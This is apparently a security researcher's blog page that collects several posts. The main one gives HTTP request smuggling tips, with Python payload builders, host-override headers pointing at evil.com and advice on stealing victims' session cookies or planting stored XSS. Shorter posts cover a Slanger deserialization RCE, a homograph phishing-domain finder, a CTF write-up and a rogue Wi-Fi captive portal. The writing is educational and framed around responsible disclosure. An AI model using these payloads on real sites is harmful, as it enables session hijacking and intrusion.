HTTP Request Smuggling – 5 Practical Tips

When James Kettle (@albinowax) from PortSwigger published his ground-breaking research on HTTP request smuggling six months ago, I did not immediately delve into the details. Instead, I ignored what was clearly a complicated type of attack for a couple of months until, when the time came for me to advise a client on their infrastructure security, I felt I had better make sure I understood what all the fuss was about.

Since then, I have been able to leverage the technique in a number of nifty scenarios with varying results. This post focuses on a number of practical considerations and techniques that I have found useful when investigating the impact of the attack against servers and websites that were found to be vulnerable. If you are unfamiliar with HTTP request smuggling, I strongly recommend you read up on the topic in order to better understand what follows below. These are the two absolute must-reads:

Recap

As a recap, there are some key topics that you need to grasp when talking about request smuggling as a technique:

  1. Desynchronization

At the heart of an HTTP request smuggling vulnerability is the fact that two communicating servers are out of sync with each other: upon receiving an HTTP request with a maliciously crafted payload, one server will interpret the payload as the end of the request and move on to the “next HTTP request” that is embedded in the payload, while the second will interpret everything as a single HTTP request and handle it as such.

  2. Request Poisoning

As a result of a successful desynchronization attack, an attacker can poison the response of the HTTP request that is appended to the malicious payload. For example, by embedding a smuggled HTTP request to a page evil.html, an unsuspecting user might get the response of the evil page, rather than the actual response to a request they sent to the server.

  3. Smuggling result

The result of a successful HTTP smuggling attack will depend heavily on how the server and the client respond to the poisoned request. For example, a successful attack against a static website that hosts a single image file will have a very different impact than successfully targeting a dynamic web application with thousands of concurrent active users. To some extent, you might be able to control the result of your smuggling attack, but in some cases you might be unlucky and have to conclude that the impact of the attack is next to nothing.
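To make the desynchronization concrete, here is a minimal sketch of the classic CL.TE payload from the research referenced above. It is a hypothetical illustration (the host `vulnerable.example` is a placeholder): the front-end honours Content-Length and forwards everything as one request, while the back-end honours Transfer-Encoding, stops reading at the zero-length chunk, and treats the leftover bytes as the prefix of the next request.

```python
def build_cl_te_payload(host: str) -> bytes:
    # The smuggled prefix that will poison the next request on the back-end.
    smuggled = b"GET /evil.html HTTP/1.1\r\nX-Ignore: x"
    # The back-end (honouring Transfer-Encoding) stops at "0\r\n\r\n";
    # the front-end (honouring Content-Length) forwards the whole body.
    body = b"0\r\n\r\n" + smuggled
    headers = (
        b"POST / HTTP/1.1\r\n"
        b"Host: " + host.encode() + b"\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        b"Transfer-Encoding: chunked\r\n"
        b"\r\n"
    )
    return headers + body

payload = build_cl_te_payload("vulnerable.example")
```

Note that Burp's HTTP Request Smuggler extension builds these payloads for you; the sketch is only meant to show what actually goes over the wire.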

Practical tips

By and large, I can divide my experiences with successful request smuggling attacks into two categories: exploiting the application logic, and exploiting server redirects.

When targeting a vulnerable website with a rich web application, it is often possible to exfiltrate sensitive information through the available application features. If any information is stored for you to retrieve at a later point in time (think of a chat, profile description, logs, ….) you might be able to store full HTTP requests in a place where you can later read them.

When leveraging server redirects, on the other hand, you need to consider two things to build a decent POC: a redirect needs to be forced, and it should point to an attacker-controlled server in order to have an impact.

Below are five practical tips that I have found useful in determining the impact of an HTTP request smuggling vulnerability.

#1 – Force a redirect

Before even trying to smuggle a malicious payload, it is worth establishing which payload will help you achieve the desired result. To test this, I typically send a number of direct requests to the vulnerable server to see how it handles edge cases. When you find a request that results in a server redirect (HTTP status code 30X), you can move on to the next step.

Some tests I have started to incorporate in my routine when looking for a redirect are:

  • /aspnet_client on Microsoft IIS will always append a trailing slash and redirect to /aspnet_client/
  • Some other directories that tend to do this are /content, /assets, /images, /styles, …
  • Often HTTP requests will redirect to HTTPS
  • I found one example where the path of the Referer header was used as the redirect target, i.e. Referer: https://www.company.com//abc.burpcollaborator.net/hacked would redirect to //abc.burpcollaborator.net/hacked
  • Some sites will redirect all files with a certain file extension, e.g. test.php to test.aspx
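These checks are easy to script. Below is a rough sketch of the probing routine I use; the candidate paths mirror the list above, and the hostname is of course only an example. Only run this against systems you are authorised to test.

```python
import http.client

# Paths that commonly trigger a trailing-slash or canonicalisation redirect
CANDIDATE_PATHS = ["/aspnet_client", "/content", "/assets", "/images", "/styles"]

def is_redirect(status: int) -> bool:
    # Any 30X status code is interesting for the next step
    return 300 <= status < 400

def probe(host: str, paths=CANDIDATE_PATHS, use_tls=True):
    """Return (path, status, Location) for every candidate that redirects."""
    conn_cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection
    hits = []
    for path in paths:
        conn = conn_cls(host, timeout=10)
        conn.request("GET", path)
        resp = conn.getresponse()
        if is_redirect(resp.status):
            hits.append((path, resp.status, resp.getheader("Location")))
        conn.close()
    return hits

# Example: probe("vulnerable.example")
```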

#2 – Specify a custom host

Once you have found a request that results in a redirect, the next step is to determine whether you can force it to redirect to a different server. I have been able to achieve this by trying each of the following:

  • Override the hostname that the server will parse in your smuggled request by including any of the following headers and investigating how the server responds to them:
    • Host: evil.com
    • X-Host: evil.com
    • X-Forwarded-Host: evil.com
  • Similarly, it might work to include the overridden hostname in the first line of the smuggled request: GET http://evil.com/ HTTP/1.1
  • Try illegally formatting the first line of the smuggled request: GET .evil.com HTTP/1.1 will work if the server appends the URI to the existing hostname: Location: https://vulnerable.com.evil.com
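The variants above can be generated mechanically. Here is a small sketch that produces each of them; `vulnerable.example` and `evil.example` are placeholders for the target and an attacker-controlled server.

```python
def host_override_variants(path: str = "/", target: str = "evil.example"):
    """Build smuggled-request variants that try to override the resolved host."""
    variants = []
    # 1. Straight Host override
    variants.append(f"GET {path} HTTP/1.1\r\nHost: {target}\r\n\r\n")
    # 2. Secondary host headers, keeping the legitimate Host in place
    for header in ("X-Host", "X-Forwarded-Host"):
        variants.append(
            f"GET {path} HTTP/1.1\r\nHost: vulnerable.example\r\n{header}: {target}\r\n\r\n"
        )
    # 3. Absolute URI in the request line
    variants.append(f"GET http://{target}{path} HTTP/1.1\r\nHost: vulnerable.example\r\n\r\n")
    # 4. Illegal request line, hoping the server appends it to its own hostname
    variants.append(f"GET .{target} HTTP/1.1\r\nHost: vulnerable.example\r\n\r\n")
    return variants

variants = host_override_variants("/hacked")
```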

#3 – Leak information

Regardless of whether you were able to issue a redirect to an attacker-controlled server, it’s worth investigating the features of the application running on the vulnerable server. This heavily depends on the type of application you are targeting, but a few pointers of things you might look for are:

  • Email features – see if you can define the contents of an email of which you receive a copy;
  • Chat features – if you can append a smuggled request, you may end up reading the full HTTP request in your chat window;
  • Update profile (name, description, …) – any field that you can write and read could be useful, as long as it allows special and new-line characters;
  • Convert JSON to a classic POST body – if you want to leverage an application feature, but it communicates via JSON (e.g. {"a":"b", "c":"3"}), see if you can change the encoding to a classic a=b&c=3 format with the header Content-Type: application/x-www-form-urlencoded.
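That last conversion is trivial to do programmatically; the snippet below shows the transformation on the example values from the bullet above.

```python
import json
from urllib.parse import urlencode

def json_to_form(json_body: str) -> str:
    """Re-encode a flat JSON object as application/x-www-form-urlencoded."""
    return urlencode(json.loads(json_body))

form_body = json_to_form('{"a": "b", "c": "3"}')  # -> a=b&c=3
```

Remember to also set `Content-Type: application/x-www-form-urlencoded` on the smuggled request when using this.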

#4 – Perfect your smuggled request

If your smuggling attack does not result in the expected redirect but instead triggers unexpected error codes (e.g. 400 Bad Request), you may need to put more information in your smuggled request. Some servers fail when they cannot find the elements they expect in an HTTP request. Here are some things that sometimes work:

  • Define Content-Length and Content-Type headers;
  • Ensure you set Content-Type to application/x-www-form-urlencoded if you are smuggling a POST request;
  • Play with the content length of the smuggled request. In a lot of cases, by increasing or decreasing the smuggled content length, the server will respond differently;
  • Switch from GET to POST requests, because some servers don’t like GET requests with a non-zero-length body;
  • Make sure the server does not receive multiple Host headers, e.g. by pushing the appended request into the POST body of your smuggled request;
  • To troubleshoot these kinds of issues, try to find a different page that reflects your poisoned HTTP request, e.g. an error page that echoes values from the POST body. If you can read the contents of your relayed request, you might figure out why the server is not accepting your payload;
  • If the server sits behind a CDN or WAF such as Cloudflare or Akamai, see if you can find its public IP via a service like SecurityTrails and point the HTTP request smuggling attack directly at this “backend”;
  • I have seen cases where the non-encrypted (HTTP) service listening on the server is vulnerable to HTTP request smuggling, whereas the secure (HTTPS) service isn’t, and the other way around. Ensure you test both services separately and investigate the impact of each. For example, when HTTP is vulnerable but all application logic is only served over HTTPS, you will have a hard time abusing application logic to demonstrate impact.
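One recurring cause of 400s in my experience is a stale Content-Length on the smuggled request. A helper like the following (a sketch; the profile endpoint and hostname are made up) recomputes it for whatever body you are experimenting with:

```python
def with_content_length(head: str, body: str) -> str:
    """Strip any stale Content-Length header and append a correct one."""
    lines = [
        line
        for line in head.rstrip("\r\n").split("\r\n")
        if not line.lower().startswith("content-length:")
    ]
    lines.append(f"Content-Length: {len(body.encode())}")
    return "\r\n".join(lines) + "\r\n\r\n" + body

req = with_content_length(
    "POST /profile HTTP/1.1\r\n"
    "Host: vulnerable.example\r\n"
    "Content-Type: application/x-www-form-urlencoded",
    "description=",
)
```

From there it is easy to loop over slightly larger or smaller bodies to see where the server's behaviour changes.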

#5 – Build a good POC

  • If you are targeting application logic and you can exfiltrate the full HTTP body of arbitrary requests, that basically boils down to session hijacking of any victim who hits your poisoned requests: you can view the session cookies in the request headers, and you are not hindered by browser-side mitigations like the HttpOnly flag in a typical XSS scenario. This is the ideal scenario from an attacker’s point of view;
  • Once you have found a successful redirect, try poisoning a few requests and monitor your attacker server to see what information comes your way. Typically a browser will not include session cookies when redirected to a different domain, but headless clients are sometimes less secure: they may not expect redirects, and might send sensitive information even when redirected to a different server. Make sure to inspect GET parameters, POST bodies and request headers for juicy information;
  • When a redirect is successful but nothing sensitive is coming your way, find a page that includes JavaScript files to turn the request poisoning into a stored XSS. Ensure your redirect points to a JavaScript payload (e.g. https://xss.honoki.net/), and create a POC that generates a bunch of iframes with the vulnerable page while poisoning the requests, until one of the <script> tags hits a poisoned request and redirects to the malicious script;
  • If the target is as static as it gets, and you cannot find a redirect, or there isn’t a page that includes a local JavaScript file, consider holding on to the vulnerability in case you can chain it with a different one instead of reporting it as is. Most bug bounty programs will not accept or reward a HTTP request smuggling vulnerability if you cannot demonstrate a tangible impact.

Finally, remember to act responsibly when testing for HTTP request smuggling, and always consider the impact on production services. When in doubt, reach out to the people running the show to ensure you are not causing any trouble.

How to: Burp ♥ OpenVPN

When performing security tests, you will often be required to send all of your traffic through a VPN. If you don’t want to send all of your local traffic over the same VPN, configuring an easy-to-use setup can sometimes be a pain. This post outlines one possible way of configuring Burp Suite to send all its traffic through a remote VPN, without having to run the VPN on your own machine.

In this guide, I will describe a setup that makes use of the following tools. Note, however, that most of these can be replaced by similar tools to accomplish the same goals.

  • Burp Suite
  • PuTTY
  • OpenVPN running on a Virtual Private Server (VPS)
  • A second VPS as a jumphost (not required if you have a static IP)
  • Browser extension Switchy Omega in Chrome or Firefox

Why?

There are a few reasons why configuring a VPN to execute your security tests may be a good idea:

  1. Testing assets that are not publicly available, e.g. located on an internal network; this is often the case when performing internal infrastructure tests or tests against UAT environments;
  2. Testing public assets from a whitelisted environment, e.g. web applications that are usually hidden behind a WAF, or applications that are internet-accessible but only available to a number of whitelisted networks;
  3. Bug bounty programs that require the use of their VPN as a condition to participate in the program.

To accommodate this need, you may be inclined to install an OpenVPN client on your local testing machine and get going. While this definitely works, I found that separating my testing activities from other network activity is not only a privacy-conscious decision, but also frees up VPN bandwidth that would otherwise be occupied by superfluous traffic.

The setup

Architecturally, the solution that I will describe looks like this:

High-level diagram of proxying traffic through a VPN using Burp Suite.

VPN tunnel

The VPN tunnel is of course the core of this setup, and will allow you to tunnel your (selected) traffic either towards assets inside a target’s environment, or towards internet-accessible assets, but originating from the target’s network. In other words, the web applications you are testing will see you coming from Target X’s IP address range, rather than from your own.

Jump host

If you have a static IP on your home or office network, or this is intended as a temporary setup (i.e. your current IP will do), you can skip this.

Otherwise, this jump host will serve as a bridge towards your VPN-connected EC2 instance. Most importantly, the jump host’s static IP allows us to exclude traffic to and from it from being routed over the VPN.

On this jump host, make sure you have access to the EC2 instance’s private key (if applicable), and set up a SOCKS proxy using the following command:

ssh -i ~/ssh-private-key.pem -D 2222 ubuntu@ec2-hostname.amazonaws.com

This will set up an SSH tunnel that will redirect all traffic proxied through port 2222 on the jump host, towards the original destination via the AWS EC2 instance (i.e. through the VPN when the VPN is activated).

AWS EC2 instance

Because it’s cheap, I opted for a t2.micro instance in AWS EC2 to set up the connection with the VPN. I am a fan of Debian-based systems, so I spun up an Ubuntu 18.04 image. Once it is up and running, you will need the following configured:

  • Install OpenVPN;
  • Upload the ovpn file containing the config of the VPN you want to connect to;
  • Whitelist your jump host (or home/office IP) from the VPN by directing traffic through the usual gateway (source);
  • Whitelist any local DNS servers if needed;
# install OpenVPN client
sudo apt install openvpn

# find out and write down your local gateway's IP address
netstat -anr

# find out and write down your local DNS servers' IP addresses
# (I needed this to allow DNS resolution in AWS EC2 when the VPN is running)
systemd-resolve --status

# Make sure both IPs you wrote down are not redirected through the VPN:
sudo route add -host <your-jumphost-ip> gw <your-local-gateway>
sudo route add -host <your-local-dns-server> gw <your-local-gateway>

# Start the VPN!
sudo openvpn --config ./openvpn-config.ovpn --daemon

Local configuration

The final steps to get this to work are:

  1. Set up local port forwarding to the SOCKS proxy on your jump host;
  2. Configure Burp Suite to use the forwarded local port as a SOCKS proxy;
  3. Use the Switchy Omega browser extension to send only selected sites towards Burp Suite and through the VPN.

On Windows, using PuTTY, you can use the following configuration to forward local port 31337 to your jump host on port 2222:

Note that “localhost” in this screenshot is relative to the remote server.

In Burp Suite, go to either User Options or Project Options, and configure SOCKS proxy to point to your localhost on port 31337:

Finally, point your Switchy Omega to your Burp proxy for selected sites:


Before kicking off your tests, I recommend you verify the public IP that is displayed when browsing to a site like ifconfig.co or ipchicken.com with your proxy enabled.
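That check can also be scripted. The sketch below assumes Burp listens on 127.0.0.1:8080 (its default) and relies on ifconfig.co returning the IP as plain text for non-browser user agents; adjust both to your setup.

```python
import urllib.request

# Route everything through the local Burp listener (default 127.0.0.1:8080)
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
opener = urllib.request.build_opener(urllib.request.ProxyHandler(proxies))

def current_ip() -> str:
    """Fetch the public IP as seen by the far end of the tunnel."""
    req = urllib.request.Request(
        "https://ifconfig.co/ip", headers={"User-Agent": "curl/8.0"}
    )
    return opener.open(req, timeout=10).read().decode().strip()

# print(current_ip())  # run with the tunnel up to confirm the exit IP
```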

Pros / cons

The described setup has a few (dis)advantages worth mentioning:

Pros

  • Reserve the VPN bandwidth for testing activities only, which can considerably improve your connection speed over a sometimes shaky VPN;
  • Separate your “background” network traffic from the VPN traffic, ensuring your privacy isn’t at risk when testing from your personal device;
  • The AWS EC2 instance can be shut down in-between tests, ensuring your bill doesn’t keep growing overnight;
  • You can configure multiple devices to connect through a single VPN connection by pointing them to the same SOCKS proxy on the jump host.

Cons

  • The setup is slightly more convoluted than just running your OpenVPN client on your local machine;
  • If the VPN connection on the AWS EC2 instance fails, you may be executing tests outside of the VPN-ed environment without noticing;
  • When configuring per-domain proxy settings, web application traffic that hits other domains will not be proxied, possibly leading to unexpected results.

I’d love to hear your thoughts on this! Did you use a similar approach? Do you have suggestions to improve or simplify this setup? Let me know in the comments below.

RCE in Slanger, a Ruby implementation of Pusher

While researching a web application last February, I learned about Slanger, an open source server implementation of Pusher. In this post I describe the discovery of a critical RCE vulnerability in Slanger 0.6.0, and the efforts that followed to responsibly disclose the vulnerability.

SECURITY NOTICE – If you are making use of Slanger in your products, stop reading and get your security fix first! A patch is available on GitHub or as part of the Ruby gem in version 0.6.1.

Pusher vs. Slanger

Pusher is a product that provides a number of libraries to enable the use of WebSockets in a variety of programming languages. WebSockets, according to their website, “represent a standard for bi-directional realtime communication between servers and clients.”

Among the features offered by Pusher are subscribing to and unsubscribing from public and private channels. For example, the following WebSocket message would result in a user subscribing to the channel “presence-example-channel”:

{
  "event": "pusher:subscribe",
  "data": {
    "channel": "presence-example-channel",
    "auth": "<APP_KEY>:<server_generated_signature>",
    "channel_data": "{
      \"user_id\": \"<unique_user_id>\",
      \"user_info\": {
        \"name\": \"Phil Leggetter\",
        \"twitter\": \"@leggetter\",
        \"blogUrl\":\"http://blog.pusher.com\"
      }
    }"
  }
}

While researching a web application, I learned about Slanger, an open-source Ruby implementation that “speaks” the Pusher protocol. In other words, it is a free alternative to Pusher that can be spun up as a stand-alone server in order to accept and process messages like the example above. At the time of writing, the vulnerable library has over 45,000 downloads on Rubygems.org.

I was able to determine what library was being used when the following error message was returned in response to my invalid input:

Request

socket = new WebSocket("wss://push.example.com/app/<app-id>?");
socket.send("test")

Response

{"event":"pusher:error","data":"{\"code\":500,\"message\":\"expected true at line 1, column 2 [parse.c:148]\\n /usr/local/rvm/gems/ruby-2.3.0/gems/slanger-0.6.0/lib/slanger/handler.rb:28:in `load'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/slanger-0.6.0/lib/slanger/handler.rb:28:in `onmessage'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/slanger-0.6.0/lib/slanger/web_socket_server.rb:30:in `block (3 levels) in run'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/connection.rb:18:in `trigger_on_message'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/message_processor_06.rb:52:in `message'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/framing07.rb:118:in `process_data'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/handler.rb:47:in `receive_data'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/em-websocket-0.5.1/lib/em-websocket/connection.rb:76:in `receive_data'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/eventmachine-1.0.9.1/lib/eventmachine.rb:193:in `run_machine'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/eventmachine-1.0.9.1/lib/eventmachine.rb:193:in `run'\\n/usr/local/rvm/gems/ruby-2.3.0/gems/slanger-0.6.0/bin/slanger:106:in `<main>'\"}"}

Note the occurrence of gem slanger-0.6.0, which appears to point to this open source Ruby project on GitHub. With all the source code at my disposal, my attention was drawn to the file handler.rb, which contained the following function responsible for handling incoming WebSocket messages:

def onmessage(msg)
  msg = Oj.load(msg)
  msg['data'] = Oj.load(msg['data']) if msg['data'].is_a? String
  event = msg['event'].gsub(/\Apusher:/, 'pusher_')
  if event =~ /\Aclient-/
    msg['socket_id'] = connection.socket_id
    Channel.send_client_message msg
  elsif respond_to? event, true
    send event, msg
  end
end

Since msg is the string that comes from the user’s end of the two-way communication, that gives us considerable control over this function. In particular, when trying to understand what Oj.load is supposed to do, this code started to look promising — from an attacker’s perspective.

Ruby unmarshalling

As it turns out, Oj (short for “Optimized JSON”) is a “fast JSON parser and Object marshaller as a Ruby gem.” Now that is interesting. From earlier experience, I knew that Ruby marshalling can lead to remote code execution vulnerabilities.

From online documentation, I learned that Oj allows serialization and deserialization of Ruby objects by default. For example, the following string is the result of an object of the class Sample::Doc being serialized with Oj.dump(sample).

{"^o":"Sample::Doc","title":"Sample","user":"ohler","create_time":{"^t":1371361533.272099000},"layers":{},"change_history":[{"^o":"Sample::Change","user":"ohler","time":{"^t":1371361533.272106000},"comment":"Changed at t+0."}],"props":{":purpose":"an example"}}

So presumably, passing a similarly serialized object via socket.send(...) should result in our input being “unmarshalled” by the underlying code in Slanger. All that now stands between an attacker’s input and remote code execution is the availability of classes and objects that can be manipulated into executing system commands.
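Oj and its gadget chains are Ruby-specific, but the underlying problem is the same one that makes Python's pickle unsafe on untrusted input: the deserializer will happily reconstruct objects whose reconstruction step is an arbitrary function call. As a deliberately harmless analogy (not Slanger's actual exploit chain):

```python
import pickle

class Exploit:
    # __reduce__ tells pickle how to rebuild the object on load, and that
    # "rebuild" step is an arbitrary callable with arbitrary arguments.
    # A real attacker would use something like os.system here; str.upper
    # keeps this demonstration harmless.
    def __reduce__(self):
        return (str.upper, ("code execution on load",))

payload = pickle.dumps(Exploit())
result = pickle.loads(payload)  # -> "CODE EXECUTION ON LOAD"
```

The lesson carries over directly: never feed attacker-controlled bytes to an object deserializer that can instantiate arbitrary classes.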

Since the Ruby gem appears to have a dependency on the Rails environment, I could build on earlier work by Charlie Somerville to construct a working payload that would lead to remote command execution in two different ways, one of which did not require knowing the app key. See the exploit in action in the video below.

Continue reading on the next page for an account of how I tried to responsibly disclose this bug.

A lot of coffee went into the writing of this article. If it helped you stay secure, please consider buying me a coffee, or invite me to your bug bounty program. 🙂


From blind XXE to root-level file read access

Polyphemus, by Johann Heinrich Wilhelm Tischbein, 1802 (Landesmuseum Oldenburg)

On a recent bug bounty adventure, I came across an XML endpoint that responded interestingly to attempted XXE exploitation. The endpoint was largely undocumented, and the only reference to it that I could find was an early 2016 post from a distraught developer in difficulties.

Below, I will outline the thought process that helped me make sense of what I encountered, and that in the end allowed me to elevate what seemed to be a medium-criticality vulnerability into a critical finding.

I will put deliberate emphasis on the various error messages that I encountered in the hope that it can point others in the right direction in the future.

Note that I have anonymised all endpoints and other identifiable information, as the vulnerability was reported as part of a private disclosure program, and the affected company does not want any information regarding their environment or this finding to be published.


Punicoder – discover domains that are phishing you

So we’re seeing homograph attacks again. Examples show how ‘apple.com’ and ‘epic.com’ can be mimicked through Internationalized Domain Names (IDN) consisting entirely of Unicode characters, i.e. xn--80ak6aa92e.com and xn--e1awd7f.com respectively.

As I found myself looking for ways to discover domain names that could be used for phishing attempts, I created a Python script called Punicoder to do the hard work for me. See the screenshot below for example output, and try it out for yourself here.

Punicoder output
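The core idea behind the script can be sketched in a few lines: substitute Latin letters with visually confusable Cyrillic lookalikes and emit the punycode (IDNA) form of each variant. This is a simplified illustration, not the actual Punicoder code, and the confusables table is only a small sample.

```python
# A small sample of Latin -> Cyrillic lookalikes (the full confusables
# tables are much larger)
CONFUSABLES = {"a": "\u0430", "e": "\u0435", "o": "\u043e", "p": "\u0440", "c": "\u0441"}

def homograph_variants(domain: str):
    """Yield (unicode_domain, punycode_domain) pairs for simple substitutions."""
    name, _, tld = domain.partition(".")
    variants = []
    for latin, lookalike in CONFUSABLES.items():
        if latin in name:
            unicode_name = name.replace(latin, lookalike) + "." + tld
            # Python's built-in idna codec produces the xn-- form
            variants.append((unicode_name, unicode_name.encode("idna").decode()))
    return variants

variants = homograph_variants("apple.com")
```

Replacing only the ‘a’ in apple.com, for instance, yields the well-known xn--pple-43d.com.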

Pro tip: use the following series of commands to find out if any of these domains resolve:

pieter@ubuntu:~$ python punicoder.py google.com | cut -d' ' -f2 | nslookup | grep -Pzo '(?s)Name:\s(.*?)Address: (.*?).Server'
Name: xn--oogle-qmc.com
Address: 185.53.178.7
Server
Name: xn--gogl-0nd52e.com
Address: 216.239.32.27
Server
Name: xn--gogl-1nd42e.com
Address: 216.239.32.27
Server
Name: xn--oole-z7bc.com
Address: 50.63.202.59
Server
Name: xn--goole-tmc.com
Address: 75.119.220.238
Server
Name: xn--ggle-55da.com
Address: 216.239.32.27
Server

Hack.lu 2015: Creative Cheating

Write-up of Hack.lu 2015’s Creative Cheating challenge.

The first challenge I solved on Hack.lu 2015, hosted by FluxFingers, was Creative Cheating.

The challenge

Mr. Miller suspects that some of his students are cheating in an automated computer test. He captured some traffic between crypto nerds Alice and Bob. It looks mostly like garbage but maybe you can figure something out. He knows that Alice’s RSA key is (n, e) = (0x53a121a11e36d7a84dde3f5d73cf, 0x10001) (192.168.0.13) and Bob’s is (n, e) = (0x99122e61dc7bede74711185598c7, 0x10001) (192.168.0.37)

The solution

Upon inspection of the packet capture, we notice that every packet from Alice (192.168.0.13) to Bob (192.168.0.37) contains a base64-encoded payload, e.g.

U0VRID0gNDsgREFUQSA9IDB4MmMyOTE1MGYxZTMxMWVmMDliYzlmMDY3MzVhY0w7IFNJRyA9IDB4MTY2NWZiMmRhNzYxYzRkZTg5ZjI3YWM4MGNiTDs=
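Decoding that payload reveals the structure of each message: a sequence number, an RSA-encrypted data block, and a signature.

```python
import base64

b64 = ("U0VRID0gNDsgREFUQSA9IDB4MmMyOTE1MGYxZTMxMWVmMDliYzlmMDY3MzVhY0w7"
       "IFNJRyA9IDB4MTY2NWZiMmRhNzYxYzRkZTg5ZjI3YWM4MGNiTDs=")
decoded = base64.b64decode(b64).decode()
# -> SEQ = 4; DATA = 0x2c29150f1e311ef09bc9f06735acL; SIG = 0x1665fb2da761c4de89f27ac80cbL;
```

The trailing L on the hex values suggests the capture was produced by a Python 2 script (long literals), which is a useful hint for the rest of the challenge.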


V – For Victor

Victor

In celebration of the birth of my godson Victor in July 2014, I composed a small piece for piano. Click the image above to download the sheet music, and listen to a somewhat messy recording below.

How to set up a Wifi captive portal

Goals

The objective of this Wifi captive portal is to mimic the behaviour of a legitimate access point protected by a portal login page, for demonstration purposes. That includes the following:

  • Broadcast a rogue access point
  • Mimic captive portal behaviour:
    • User gets to see a login page when trying to connect;
    • After logging in, the user can continue to access the network and surf freely.


CSRF Discoverer – A Chrome extension
